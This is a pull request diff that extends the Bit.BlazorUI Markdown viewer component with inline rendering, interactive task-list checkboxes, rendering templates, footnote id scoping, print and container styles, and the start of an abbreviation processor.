### PR TITLE
Apply BitMarkdownViewer improvements (#13176)

### DIFF
--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
@@ -257,10 +257,12 @@ public partial class BitMarkdownViewer : BitComponentBase
         // stores the new source somewhere the component does not read back.
         checkbox.Checked = isChecked;
 
+        // The box itself carries the line its marker was parsed from, so the marker rewritten is
+        // the one the reader clicked - not one a second scan of the source went looking for.
         return OnTaskChanged.InvokeAsync(new BitMarkdownViewerTaskChangedEventArgs(
             checkbox.Index,
             isChecked,
-            BitMarkdownTaskList.Toggle(Markdown, checkbox.Index, isChecked)));
+            BitMarkdownTaskList.Toggle(Markdown, checkbox, isChecked)));
     }
 
     /// <summary>
@@ -364,7 +366,9 @@ public partial class BitMarkdownViewer : BitComponentBase
             {
                 new BitMarkdownViewerTemplateRenderer(this)
             };
-            _templateRenderer = new BitMarkdownRenderer(renderers);
+            // Given the pipeline's own words, so supplying a template does not silently put a
+            // localized document's alerts and back-links back into English.
+            _templateRenderer = new BitMarkdownRenderer(renderers, pipeline.Texts);
             _templateRendererPipeline = pipeline;
         }
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
@@ -31,7 +31,10 @@ public partial class BitMarkdownViewer : BitComponentBase
     private int _parsedMaxDepth;
     private int _parsedMaxLength;
     private bool _parsedStripBidi;
+    private bool _parsedInteractiveTasks;
     private bool _notifyParsed;
+    private BitMarkdownRenderer? _templateRenderer;
+    private BitMarkdownPipeline? _templateRendererPipeline;
 
 
 
@@ -90,12 +93,59 @@ public partial class BitMarkdownViewer : BitComponentBase
     [Parameter] public bool StripBidiControlCharacters { get; set; }
 
     /// <summary>
+    /// Renders the document as inline content: the root element becomes a <c>span</c> and each
+    /// top-level paragraph contributes its inline content directly, without the <c>&lt;p&gt;</c>
+    /// that would otherwise force a line of its own. Use it where a short piece of Markdown has to
+    /// sit inside a sentence, a table cell or a label. Blocks that are not paragraphs (lists,
+    /// tables, headings) still render as themselves. Defaults to <c>false</c>.
+    /// </summary>
+    [Parameter, ResetClassBuilder] public bool Inline { get; set; }
+
+    /// <summary>
     /// Called after the Markdown source has been parsed, with the document that is about to
     /// be rendered. The tree is the same one the renderer walks, so a handler can read it -
     /// to build a table of contents from the headings, for example - or rewrite it before it
     /// reaches the DOM.
     /// </summary>
     [Parameter] public EventCallback<BitMarkdownDocumentNode> OnParsed { get; set; }
+
+    /// <summary>
+    /// Called when a reader ticks or unticks a task-list checkbox, with the source rewritten to
+    /// match. Setting it is what makes the checkboxes interactive at all: with no handler they stay
+    /// the read-only boxes GitHub renders, so a document nobody is storing cannot be half-edited.
+    /// The viewer does not change <see cref="Markdown"/> itself - it hands you the new source and
+    /// leaves storing it to you, which is what keeps the component's state the one you own.
+    /// Requires the task-list flavor.
+    /// </summary>
+    [Parameter] public EventCallback<BitMarkdownViewerTaskChangedEventArgs> OnTaskChanged { get; set; }
+
+    /// <summary>
+    /// Renders every fenced or indented code block, instead of the <c>&lt;pre&gt;&lt;code&gt;</c>
+    /// the viewer would otherwise draw. This is where a syntax highlighter, a copy button or a
+    /// diagram renderer goes: the template is given the block, so it can read the language off
+    /// <c>Info</c> and the source off <c>Content</c>.
+    /// </summary>
+    [Parameter] public RenderFragment<BitMarkdownCodeBlockNode>? CodeBlockTemplate { get; set; }
+
+    /// <summary>
+    /// Renders every image, instead of the <c>&lt;img&gt;</c> the viewer would otherwise draw -
+    /// for a lightbox, a placeholder while it loads, or a component that serves a modern format.
+    /// The <see cref="ImageRendering"/> policy has already been applied when the template runs, so
+    /// a blocked image reaches it with an empty <c>Url</c>.
+    /// </summary>
+    [Parameter] public RenderFragment<BitMarkdownImageNode>? ImageTemplate { get; set; }
+
+    /// <summary>
+    /// Renders every link, instead of the <c>&lt;a&gt;</c> the viewer would otherwise draw - to
+    /// route an in-app destination through the router, or to decorate an external one. The
+    /// destination has already been sanitized when the template runs.
+    /// </summary>
+    /// <remarks>
+    /// A link's own content is not rendered for you: write
+    /// <c>@context.Children</c> through a renderer of your own, or - far more usually - read
+    /// <c>BitMarkdownInlineHelpers.PlainText(context.Children)</c> for its text.
+    /// </remarks>
+    [Parameter] public RenderFragment<BitMarkdownLinkNode>? LinkTemplate { get; set; }
 
 
 
@@ -108,6 +158,11 @@ public partial class BitMarkdownViewer : BitComponentBase
 
 
     protected override string RootElementClass => "bit-mdv";
+
+    protected override void RegisterCssClasses()
+    {
+        ClassBuilder.Register(() => Inline ? "bit-mdv-inline" : string.Empty);
+    }
 
     private BitMarkdownPipeline EffectivePipeline => Pipeline ?? BitMarkdownPipelines.Basic;
 
@@ -122,16 +177,19 @@ public partial class BitMarkdownViewer : BitComponentBase
             _parsedImageRendering != ImageRendering ||
             _parsedMaxDepth != maxDepth ||
             _parsedMaxLength != MaxLength ||
-            _parsedStripBidi != StripBidiControlCharacters)
+            _parsedStripBidi != StripBidiControlCharacters ||
+            _parsedInteractiveTasks != OnTaskChanged.HasDelegate)
         {
             _document = ParseSafely(pipeline, maxDepth);
             ApplyImageRendering(_document.Children);
+            WireTaskCheckboxes();
             _parsedSource = Markdown;
             _parsedWith = pipeline;
             _parsedImageRendering = ImageRendering;
             _parsedMaxDepth = maxDepth;
             _parsedMaxLength = MaxLength;
             _parsedStripBidi = StripBidiControlCharacters;
+            _parsedInteractiveTasks = OnTaskChanged.HasDelegate;
             _notifyParsed = true;
         }
 
@@ -152,6 +210,36 @@ public partial class BitMarkdownViewer : BitComponentBase
                 await OnParsed.InvokeAsync(_document);
             }
         }
+    }
+
+    /// <summary>
+    /// Gives every task-list checkbox the handler that makes it interactive, when the host is
+    /// listening. The handler reads <see cref="OnTaskChanged"/> at the moment it fires rather than
+    /// capturing it, so the callback the host most recently supplied is always the one invoked.
+    /// </summary>
+    private void WireTaskCheckboxes()
+    {
+        if (OnTaskChanged.HasDelegate is false) return;
+
+        foreach (var checkbox in BitMarkdownAstHelper.Descendants(_document).OfType<BitMarkdownTaskCheckboxNode>())
+        {
+            var box = checkbox;
+            box.OnChange = EventCallback.Factory.Create<ChangeEventArgs>(this, args => HandleTaskChangedAsync(box, args));
+        }
+    }
+
+    private Task HandleTaskChangedAsync(BitMarkdownTaskCheckboxNode checkbox, ChangeEventArgs args)
+    {
+        bool isChecked = args.Value is bool value ? value : bool.TryParse(args.Value?.ToString(), out var parsed) && parsed;
+
+        // The tree is updated so the box keeps the state the reader just gave it even if the host
+        // stores the new source somewhere the component does not read back.
+        checkbox.Checked = isChecked;
+
+        return OnTaskChanged.InvokeAsync(new BitMarkdownViewerTaskChangedEventArgs(
+            checkbox.Index,
+            isChecked,
+            BitMarkdownTaskList.Toggle(Markdown, checkbox.Index, isChecked)));
     }
 
     /// <summary>
@@ -196,9 +284,14 @@ public partial class BitMarkdownViewer : BitComponentBase
 
     protected override void BuildRenderTree(RenderTreeBuilder builder)
     {
-        var renderer = EffectivePipeline.CreateRenderer();
+        var renderer = ResolveRenderer();
 
-        builder.OpenElement(0, "div");
+        // Inline mode wants a span, but a span may not legally hold a list or a table. A document
+        // that is nothing but paragraphs gets one; anything else keeps the div and is laid out
+        // inline by the stylesheet instead, so the markup stays valid either way.
+        bool asSpan = Inline && HoldsOnlyParagraphs(_document.Children);
+
+        builder.OpenElement(0, asSpan ? "span" : "div");
 
         builder.AddMultipleAttributes(1, HtmlAttributes);
         builder.AddAttribute(2, "id", _Id);
@@ -210,17 +303,82 @@ public partial class BitMarkdownViewer : BitComponentBase
         }
         if (AriaLabel is not null)
         {
-            builder.AddAttribute(7, "aria-label", AriaLabel);
+            builder.AddAttribute(6, "aria-label", AriaLabel);
         }
         if (TabIndex is not null)
         {
-            builder.AddAttribute(8, "tabindex", TabIndex);
+            builder.AddAttribute(7, "tabindex", TabIndex);
         }
-        builder.AddElementReferenceCapture(6, v => RootElement = v);
+        builder.AddElementReferenceCapture(8, v => RootElement = v);
 
-        renderer.WriteNodes(builder, _document.Children);
+        if (Inline)
+        {
+            WriteInline(renderer, builder, _document.Children);
+        }
+        else
+        {
+            renderer.WriteNodes(builder, _document.Children);
+        }
 
         builder.CloseElement();
+    }
+
+    /// <summary>
+    /// The renderer this viewer draws with. With no template supplied it is the pipeline's own,
+    /// shared instance - which holds nothing but the pipeline's immutable renderer list, so there
+    /// is nothing to allocate per render. A viewer that does supply one gets a renderer of its own,
+    /// built once, with the template renderer last so it wins over everything the pipeline
+    /// registered.
+    /// </summary>
+    private BitMarkdownRenderer ResolveRenderer()
+    {
+        var pipeline = EffectivePipeline;
+
+        if (CodeBlockTemplate is null && ImageTemplate is null && LinkTemplate is null)
+            return pipeline.Renderer;
+
+        if (_templateRenderer is null || ReferenceEquals(_templateRendererPipeline, pipeline) is false)
+        {
+            var renderers = new List<BitMarkdownNodeRenderer>(pipeline.Renderers)
+            {
+                new BitMarkdownViewerTemplateRenderer(this)
+            };
+            _templateRenderer = new BitMarkdownRenderer(renderers);
+            _templateRendererPipeline = pipeline;
+        }
+
+        return _templateRenderer;
+    }
+
+    private static bool HoldsOnlyParagraphs(IList<BitMarkdownNode> nodes)
+    {
+        foreach (var node in nodes)
+        {
+            if (node is not BitMarkdownParagraphNode) return false;
+        }
+        return true;
+    }
+
+    /// <summary>
+    /// Writes the document without the block wrapper each top-level paragraph would otherwise get,
+    /// so a one-line piece of Markdown can sit inside a sentence, a table cell or a button label.
+    /// Every other block (a list, a table, a heading) still renders as itself.
+    /// </summary>
+    private static void WriteInline(BitMarkdownRenderer renderer, RenderTreeBuilder builder, IList<BitMarkdownNode> nodes)
+    {
+        for (int i = 0; i < nodes.Count; i++)
+        {
+            if (nodes[i] is BitMarkdownParagraphNode paragraph)
+            {
+                // Paragraphs are separated by a space rather than run together, so two of them do
+                // not read as one word.
+                if (i > 0) builder.AddContent(9, " ");
+                renderer.WriteNodes(builder, paragraph.Inlines);
+                continue;
+            }
+
+            renderer.WriteNode(builder, nodes[i]);
+        }
     }
 
     /// <summary>

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
@@ -8,9 +8,11 @@ namespace Bit.BlazorUI;
 /// </summary>
 /// <remarks>
 /// <para>
-/// By default the component understands only the basic CommonMark core. Richer flavors
-/// (GitHub tables, strikethrough, task lists, autolinks, emoji, ...) are opt-in: supply
-/// a <see cref="Pipeline"/> built with the desired extensions (for example
+/// By default the component understands the CommonMark core: headings, emphasis, links and
+/// images (including reference links and link reference definitions), lists, block quotes,
+/// code, and HTML character references. Richer flavors (GitHub tables, strikethrough, task
+/// lists, autolinks, footnotes, alerts, emoji, ...) are opt-in: supply a
+/// <see cref="Pipeline"/> built with the desired extensions (for example
 /// <see cref="BitMarkdownPipelines.GitHub"/>).
 /// </para>
 /// <para>
@@ -29,6 +31,7 @@ public partial class BitMarkdownViewer : BitComponentBase
     private int _parsedMaxDepth;
     private int _parsedMaxLength;
     private bool _parsedStripBidi;
+    private bool _notifyParsed;
 
 
 
@@ -86,6 +89,22 @@ public partial class BitMarkdownViewer : BitComponentBase
     /// </summary>
     [Parameter] public bool StripBidiControlCharacters { get; set; }
 
+    /// <summary>
+    /// Called after the Markdown source has been parsed, with the document that is about to
+    /// be rendered. The tree is the same one the renderer walks, so a handler can read it -
+    /// to build a table of contents from the headings, for example - or rewrite it before it
+    /// reaches the DOM.
+    /// </summary>
+    [Parameter] public EventCallback<BitMarkdownDocumentNode> OnParsed { get; set; }
+
+
+
+    /// <summary>
+    /// The most recently parsed document. Useful for reading structure out of the source
+    /// (headings, links, images) without parsing it a second time.
+    /// </summary>
+    public BitMarkdownDocumentNode Document => _document;
+
 
 
     protected override string RootElementClass => "bit-mdv";
@@ -113,9 +132,26 @@ public partial class BitMarkdownViewer : BitComponentBase
             _parsedMaxDepth = maxDepth;
             _parsedMaxLength = MaxLength;
             _parsedStripBidi = StripBidiControlCharacters;
+            _notifyParsed = true;
         }
 
         base.OnParametersSet();
+    }
+
+    protected override async Task OnParametersSetAsync()
+    {
+        await base.OnParametersSetAsync();
+
+        // Raised from the async half of the lifecycle so an exception thrown by the handler
+        // surfaces through the renderer instead of being lost on an unobserved task.
+        if (_notifyParsed)
+        {
+            _notifyParsed = false;
+            if (OnParsed.HasDelegate)
+            {
+                await OnParsed.InvokeAsync(_document);
+            }
+        }
     }
 
     /// <summary>
@@ -131,7 +167,14 @@ public partial class BitMarkdownViewer : BitComponentBase
             source = BitMarkdownTextSanitizer.StripBidiControlCharacters(source);
 
         if (MaxLength > 0 && source is not null && source.Length > MaxLength)
-            source = source[..MaxLength];
+        {
+            // Never cut between the two halves of a surrogate pair: the lone half would
+            // render as a replacement character instead of the emoji (or other astral
+            // character) the author wrote.
+            int end = MaxLength;
+            if (char.IsHighSurrogate(source[end - 1])) end--;
+            source = source[..end];
+        }
 
         var options = new BitMarkdownParseOptions { MaxDepth = maxDepth };
 
@@ -164,6 +207,14 @@ public partial class BitMarkdownViewer : BitComponentBase
         if (Dir is not null)
         {
             builder.AddAttribute(5, "dir", Dir.Value.ToString().ToLower());
+        }
+        if (AriaLabel is not null)
+        {
+            builder.AddAttribute(7, "aria-label", AriaLabel);
+        }
+        if (TabIndex is not null)
+        {
+            builder.AddAttribute(8, "tabindex", TabIndex);
         }
         builder.AddElementReferenceCapture(6, v => RootElement = v);
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
@@ -183,6 +183,7 @@ public partial class BitMarkdownViewer : BitComponentBase
             _document = ParseSafely(pipeline, maxDepth);
             ApplyImageRendering(_document.Children);
             WireTaskCheckboxes();
+            ScopeFootnoteIds();
             _parsedSource = Markdown;
             _parsedWith = pipeline;
             _parsedImageRendering = ImageRendering;
@@ -225,6 +226,26 @@ public partial class BitMarkdownViewer : BitComponentBase
         {
             var box = checkbox;
             box.OnChange = EventCallback.Factory.Create<ChangeEventArgs>(this, args => HandleTaskChangedAsync(box, args));
+        }
+    }
+
+    /// <summary>
+    /// Stamps this instance's unique id onto every footnote node, so the ids and the links
+    /// between them belong to this viewer alone. Two viewers showing footnotes on the same page
+    /// would otherwise emit the same ids, and a reference in one would jump into the other.
+    /// </summary>
+    private void ScopeFootnoteIds()
+    {
+        if (_document.Children.OfType<BitMarkdownFootnotesNode>().Any() is false) return;
+
+        foreach (var node in BitMarkdownAstHelper.Descendants(_document))
+        {
+            switch (node)
+            {
+                case BitMarkdownFootnotesNode footnotes: footnotes.IdScope = UniqueId; break;
+                case BitMarkdownFootnoteDefinitionNode definition: definition.IdScope = UniqueId; break;
+                case BitMarkdownFootnoteReferenceNode reference: reference.IdScope = UniqueId; break;
+            }
         }
     }
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.scss
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.scss
@@ -120,8 +120,7 @@
         margin-top: 0.25em;
     }
 
-    li:has(> .task-list-item-checkbox),
-    li:has(> p > .task-list-item-checkbox) {
+    li.task-list-item {
         list-style-type: none;
     }
 
@@ -139,12 +138,22 @@
         background-color: $clr-brd-pri;
     }
 
+    // The table scrolls inside its wrapper rather than by becoming a block itself, so it keeps
+    // the row/column semantics assistive technology reads it with.
+    .bit-mdv-table-wrapper {
+        max-width: 100%;
+        overflow-x: auto;
+        margin-bottom: 1em;
+
+        &:focus-visible {
+            outline: $shp-border-width-thick $shp-border-style $clr-pri;
+            outline-offset: 2px;
+        }
+    }
+
     table {
-        display: block;
         width: max-content;
         max-width: 100%;
-        overflow: auto;
-        margin-bottom: 1em;
         border-collapse: collapse;
 
         th,
@@ -165,6 +174,172 @@
     img {
         max-width: 100%;
         box-sizing: content-box;
+    }
+
+    // Emphasis extras. <sub> and <sup> keep the line height they sit on, and the two "changed
+    // text" marks read as such without borrowing the link or the error colour.
+    sub,
+    sup {
+        font-size: $tg-fs-2xs;
+        line-height: 0;
+    }
+
+    ins {
+        text-decoration: underline;
+    }
+
+    mark {
+        padding: 0 0.2em;
+        border-radius: $shp-radius-xs;
+        color: $clr-fg-pri;
+        background-color: $clr-wrn-light;
+    }
+
+    // The heading permalink stays out of the way until the heading is hovered or the link itself
+    // is focused, so it never competes with the heading it belongs to.
+    .bit-mdv-anchor {
+        margin-inline-start: 0.35em;
+        color: $clr-fg-sec;
+        opacity: 0;
+        text-decoration: none;
+        transition: opacity $mot-duration-short $mot-easing;
+
+        &:focus-visible {
+            opacity: 1;
+        }
+    }
+
+    h1:hover > .bit-mdv-anchor,
+    h2:hover > .bit-mdv-anchor,
+    h3:hover > .bit-mdv-anchor,
+    h4:hover > .bit-mdv-anchor,
+    h5:hover > .bit-mdv-anchor,
+    h6:hover > .bit-mdv-anchor {
+        opacity: 1;
+    }
+
+
+    // Custom containers. The generic block is a quiet surface; the names a documentation site
+    // reaches for most get the same colour vocabulary the alerts use, so a page that mixes both
+    // does not read as two design systems.
+    .markdown-container {
+        margin-bottom: 1em;
+        padding: 0.75em 1em;
+        border-radius: $shp-radius-surface;
+        border-inline-start: $shp-border-width-thick $shp-border-style $clr-brd-pri;
+        background-color: $clr-bg-sec;
+
+        > *:first-child {
+            margin-top: 0;
+        }
+
+        > *:last-child {
+            margin-bottom: 0;
+        }
+    }
+
+    // The collapsible container. The summary is the row you click, so it carries the title's
+    // weight and a pointer.
+    details.markdown-container {
+        > summary {
+            cursor: pointer;
+            font-weight: $tg-fw-semibold;
+            line-height: 1.2;
+        }
+
+        > *:not(summary):first-of-type {
+            margin-top: 0.5em;
+        }
+    }
+
+    .markdown-container-title {
+        margin-bottom: 0.25em;
+        font-weight: $tg-fw-semibold;
+        line-height: 1.2;
+    }
+
+    .markdown-container-note,
+    .markdown-container-info {
+        border-inline-start-color: $clr-inf;
+
+        > .markdown-container-title {
+            color: $clr-inf;
+        }
+    }
+
+    .markdown-container-tip,
+    .markdown-container-success {
+        border-inline-start-color: $clr-suc;
+
+        > .markdown-container-title {
+            color: $clr-suc;
+        }
+    }
+
+    .markdown-container-warning {
+        border-inline-start-color: $clr-wrn;
+
+        > .markdown-container-title {
+            color: $clr-wrn;
+        }
+    }
+
+    .markdown-container-caution,
+    .markdown-container-danger {
+        border-inline-start-color: $clr-err;
+
+        > .markdown-container-title {
+            color: $clr-err;
+        }
+    }
+
+    // Definition lists. The term leads and its definitions are indented under it, which is the
+    // shape a reader already expects from a glossary.
+    dl {
+        margin-top: 0;
+        margin-bottom: 1em;
+    }
+
+    dt {
+        margin-top: 0.75em;
+        font-weight: $tg-fw-semibold;
+    }
+
+    dd {
+        margin-inline-start: 2em;
+    }
+
+    // A figure is the picture and its caption as one block, so the caption is set apart from the
+    // body text it would otherwise be mistaken for.
+    figure {
+        margin: 0 0 1em 0;
+    }
+
+    figcaption {
+        margin-top: 0.5em;
+        font-size: $tg-fs-xs;
+        color: $clr-fg-sec;
+    }
+
+    // An abbreviation announces that it can be expanded, without the underline reading as a link.
+    abbr[title] {
+        cursor: help;
+        text-decoration: underline dotted;
+    }
+
+    // Mathematics is left as the TeX it is until a typesetter on the page replaces it; until then
+    // it at least reads as something set apart from the prose.
+    .math {
+        font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, monospace;
+    }
+
+    // Display style is centred on a line of its own whether the run was written as a block or
+    // inside a paragraph - the element differs so the markup stays valid, the layout does not.
+    .math-display {
+        display: block;
+        overflow-x: auto;
+        margin-bottom: 1em;
+        text-align: center;
     }
 
     // Pipe-table column alignment. Applied as a class rather than an inline style so the
@@ -270,5 +445,55 @@
 
     .footnote-backref {
         text-decoration: none;
+    }
+}
+
+// Inline mode: the root is a span that flows with the text around it, and the blocks it may still
+// hold are kept from forcing a line of their own.
+.bit-mdv.bit-mdv-inline {
+    display: inline;
+    width: auto;
+
+    > * {
+        display: inline;
+    }
+
+    > ul,
+    > ol,
+    > table,
+    > pre,
+    > blockquote {
+        display: inline-block;
+        vertical-align: top;
+    }
+}
+
+// Print: a document is read on paper as often as on a screen, and the two things that ruin it
+// there are a code block or a table split across a page break, and a heading stranded at the
+// bottom of one.
+@media print {
+    .bit-mdv {
+        pre,
+        blockquote,
+        table,
+        figure,
+        .markdown-alert,
+        .markdown-container {
+            break-inside: avoid;
+        }
+
+        h1,
+        h2,
+        h3,
+        h4,
+        h5,
+        h6 {
+            break-after: avoid;
+        }
+
+        // The permalink is a screen affordance and says nothing on paper.
+        .bit-mdv-anchor {
+            display: none;
+        }
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.scss
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.scss
@@ -166,4 +166,109 @@
         max-width: 100%;
         box-sizing: content-box;
     }
+
+    // Pipe-table column alignment. Applied as a class rather than an inline style so the
+    // rendered document still aligns under a strict Content-Security-Policy.
+    .bit-mdv-align-left {
+        text-align: start;
+    }
+
+    .bit-mdv-align-center {
+        text-align: center;
+    }
+
+    .bit-mdv-align-right {
+        text-align: end;
+    }
+
+    // GitHub alerts. Each kind is a tinted rule down the inline start edge plus a coloured
+    // title, so the kind survives both a monochrome print and a screen reader.
+    .markdown-alert {
+        margin-bottom: 1em;
+        padding: 0.5em 1em;
+        border-inline-start: $shp-border-width-thick $shp-border-style $clr-brd-pri;
+
+        > *:first-child {
+            margin-top: 0;
+        }
+
+        > *:last-child {
+            margin-bottom: 0;
+        }
+    }
+
+    .markdown-alert-title {
+        display: flex;
+        gap: 0.5em;
+        align-items: center;
+        margin-bottom: 0.25em;
+        font-weight: $tg-fw-semibold;
+        line-height: 1;
+    }
+
+    .markdown-alert-note {
+        border-inline-start-color: $clr-inf;
+
+        > .markdown-alert-title {
+            color: $clr-inf;
+        }
+    }
+
+    .markdown-alert-tip {
+        border-inline-start-color: $clr-suc;
+
+        > .markdown-alert-title {
+            color: $clr-suc;
+        }
+    }
+
+    .markdown-alert-important {
+        border-inline-start-color: $clr-pri;
+
+        > .markdown-alert-title {
+            color: $clr-pri;
+        }
+    }
+
+    .markdown-alert-warning {
+        border-inline-start-color: $clr-wrn;
+
+        > .markdown-alert-title {
+            color: $clr-wrn;
+        }
+    }
+
+    .markdown-alert-caution {
+        border-inline-start-color: $clr-err;
+
+        > .markdown-alert-title {
+            color: $clr-err;
+        }
+    }
+
+    // Footnotes: the section is set apart and typographically quieter than the body it
+    // annotates, and each marker stays small enough not to disturb the line it sits on.
+    .footnote-ref {
+        font-size: $tg-fs-2xs;
+        line-height: 0;
+    }
+
+    .footnotes {
+        font-size: $tg-fs-xs;
+        color: $clr-fg-sec;
+
+        > hr {
+            height: $shp-border-width;
+            margin: 2em 0 1em 0;
+            background-color: $clr-brd-sec;
+        }
+
+        > ol {
+            margin-bottom: 0;
+        }
+    }
+
+    .footnote-backref {
+        text-decoration: none;
+    }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerImageRendering.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerImageRendering.cs
@@ -16,10 +16,13 @@ public enum BitMarkdownViewerImageRendering
     All,
 
     /// <summary>
-    /// Only same-origin images (relative paths, anchors and same-document references) are
-    /// loaded. Remote images (<c>http:</c>, <c>https:</c> and protocol-relative <c>//</c>)
-    /// are blocked so they cannot trigger automatic cross-origin requests. The alt text is
-    /// still rendered. This is the recommended mode for untrusted or AI-generated Markdown.
+    /// Only images the browser would fetch from the page's own origin are loaded: relative paths,
+    /// anchors, same-document references, absolute URLs pointing back at the current origin, and
+    /// embedded <c>data:</c> images, which are already part of the document and reach the network
+    /// not at all. Genuinely cross-origin images (<c>http:</c>, <c>https:</c> and protocol-relative
+    /// <c>//</c> URLs resolving elsewhere) are blocked so they cannot trigger an automatic
+    /// cross-origin request. The alt text is still rendered. This is the recommended mode for
+    /// untrusted or AI-generated Markdown.
     /// </summary>
     SameOrigin,
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerTaskChangedEventArgs.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerTaskChangedEventArgs.cs
@@ -7,6 +7,8 @@ namespace Bit.BlazorUI;
 /// <param name="Checked">Its new state.</param>
 /// <param name="Markdown">
 /// The source with that one marker rewritten, ready to be stored. It is produced by
-/// <see cref="BitMarkdownTaskList.Toggle"/>, which counts the same markers the viewer drew.
+/// <see cref="BitMarkdownTaskList.Toggle(string, BitMarkdownTaskCheckboxNode, bool)"/> from the
+/// checkbox itself, which carries the line its marker was parsed from - so the marker rewritten is
+/// the one the reader clicked, whatever else in the document looks like a task.
 /// </param>
 public readonly record struct BitMarkdownViewerTaskChangedEventArgs(int Index, bool Checked, string Markdown);

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerTaskChangedEventArgs.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerTaskChangedEventArgs.cs
@@ -1,0 +1,12 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// What the viewer reports when a reader ticks or unticks a task-list checkbox.
+/// </summary>
+/// <param name="Index">The checkbox's position in the document, counted from 0 in reading order.</param>
+/// <param name="Checked">Its new state.</param>
+/// <param name="Markdown">
+/// The source with that one marker rewritten, ready to be stored. It is produced by
+/// <see cref="BitMarkdownTaskList.Toggle"/>, which counts the same markers the viewer drew.
+/// </param>
+public readonly record struct BitMarkdownViewerTaskChangedEventArgs(int Index, bool Checked, string Markdown);

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerTemplateRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerTemplateRenderer.cs
@@ -1,0 +1,48 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Hands the node types a viewer has a template for to that template instead of to the renderer
+/// that would otherwise draw them, so a host can put its own component in the middle of a rendered
+/// document - a highlighter around a code block, a lightbox around an image, a router-aware anchor
+/// around a link - without writing a renderer or a pipeline of its own.
+/// </summary>
+/// <remarks>
+/// This renderer belongs to one viewer rather than to a pipeline: the templates are that viewer's
+/// parameters, and it reads them at the moment it draws, so a template supplied on a later render
+/// takes effect without anything being rebuilt.
+/// </remarks>
+internal sealed class BitMarkdownViewerTemplateRenderer : BitMarkdownNodeRenderer
+{
+    private readonly BitMarkdownViewer _viewer;
+
+    public BitMarkdownViewerTemplateRenderer(BitMarkdownViewer viewer) => _viewer = viewer;
+
+    public override bool Accept(BitMarkdownNode node) => node switch
+    {
+        BitMarkdownCodeBlockNode => _viewer.CodeBlockTemplate is not null,
+        BitMarkdownImageNode => _viewer.ImageTemplate is not null,
+        BitMarkdownLinkNode => _viewer.LinkTemplate is not null,
+        _ => false
+    };
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer renderer, RenderTreeBuilder builder, BitMarkdownNode node)
+    {
+        switch (node)
+        {
+            case BitMarkdownCodeBlockNode code:
+                builder.AddContent(0, _viewer.CodeBlockTemplate, code);
+                break;
+
+            case BitMarkdownImageNode image:
+                builder.AddContent(1, _viewer.ImageTemplate, image);
+                break;
+
+            case BitMarkdownLinkNode link:
+                builder.AddContent(2, _viewer.LinkTemplate, link);
+                break;
+        }
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationAstProcessor.cs
@@ -1,0 +1,109 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Collects every abbreviation definition, removes it from the rendered tree, and wraps each whole
+/// -word occurrence of the term in the text with a <see cref="BitMarkdownAbbreviationNode"/>.
+/// </summary>
+/// <remarks>
+/// Only text is rewritten, so a term inside a code span, a code block or a URL is left exactly as
+/// written - an abbreviation is a reading aid, not a search-and-replace. Longer terms are matched
+/// first, so defining both <c>HTML</c> and <c>HTML5</c> expands the longer one where it appears.
+/// </remarks>
+public sealed class BitMarkdownAbbreviationAstProcessor : BitMarkdownAstProcessor
+{
+    // After the core reference resolver and the text merge (0, 1) - so the terms are matched against
+    // the text the author actually wrote rather than the fragments the scanner split it into - and
+    // after the flavors that read whole runs of text themselves. Autolink literals in particular
+    // have to see a URL as one piece: splitting an abbreviation out of it first would leave only
+    // part of the URL linked.
+    public override int Order => 150;
+
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        var definitions = new Dictionary<string, string>(StringComparer.Ordinal);
+
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            for (int i = 0; i < list.Count; i++)
+            {
+                if (list[i] is BitMarkdownAbbreviationDefinitionNode definition)
+                    definitions.TryAdd(definition.Label, definition.Title);
+            }
+
+            for (int i = list.Count - 1; i >= 0; i--)
+            {
+                if (list[i] is BitMarkdownAbbreviationDefinitionNode) list.RemoveAt(i);
+            }
+        });
+
